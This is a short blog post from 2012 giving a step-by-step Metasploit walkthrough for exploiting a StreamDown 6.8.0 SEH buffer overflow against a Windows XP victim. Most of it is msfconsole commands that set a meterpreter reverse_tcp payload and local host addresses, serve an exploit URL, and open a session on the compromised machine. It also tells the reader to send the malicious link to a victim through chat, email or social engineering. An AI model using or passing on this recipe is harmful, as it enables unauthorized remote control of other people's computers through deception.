Banner 480

Senin, 14 Mei 2012

Attacking on Remote PC using StreamDown 6.8.0 Buffer Overflow

Stream Down 6.8.0 seh based buffer overflow triggered when processing the server reponse packet. During the overflow a structured exception handler is overwritten.

Exploit Targets
Stream down 6.8.0
Internet Explorer 7 on XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/misc/stream_down_bof

Msf exploit (stream_down_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (stream_down_bof)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (stream_down_bof)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (stream_down_bof)>set uripath newsongs (The Url to use for this exploit)
Msf exploit (stream_down_bof)>exploit 


Now an URL you should give to your victim http://192.168.1.2:8080/newsongs


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Banner 480 bawah




Your Clicks! Your Earning!